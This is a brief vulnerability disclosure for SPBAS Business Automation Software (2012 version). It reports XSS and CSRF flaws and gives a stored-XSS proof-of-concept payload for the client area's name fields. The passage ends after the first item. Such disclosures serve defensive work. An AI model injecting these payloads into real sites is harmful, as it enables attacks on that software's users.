# SPBAS Business Automation Software- XSS & CSRF Vulnerability
# Date: 16 June 2013
# Author: Christy Philip Mathew - wwwoffconorg
# Vendor or Software Link: wwwspbascom
# Version: 2012
*1XSS Vulnerability*
(a) Client Area -> My Info -> Update the first name and last name to
john"><img src=x onerror=prompt(0);>
( ...